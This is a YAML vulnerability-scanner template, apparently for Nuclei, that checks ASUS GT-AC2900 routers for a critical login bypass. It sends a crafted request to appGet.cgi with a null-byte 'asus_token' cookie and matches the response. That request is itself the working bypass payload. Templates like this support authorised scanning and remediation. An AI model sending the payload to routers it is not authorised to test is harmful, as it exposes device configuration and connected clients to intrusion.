id: GT-AC2900-login

info:
  name: GT-AC2900 登录绕过
  author: Str1am
  severity: critical
  reference: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
  tags: AC2900,ASSUS

requests:
  - raw:
      - |
        GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
        Host: {{Hostname}}
        Cookie: asus_token=\0Invalid; clickedItem_tab=0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "get_cfg_clientlist"
        part: body
        condition: and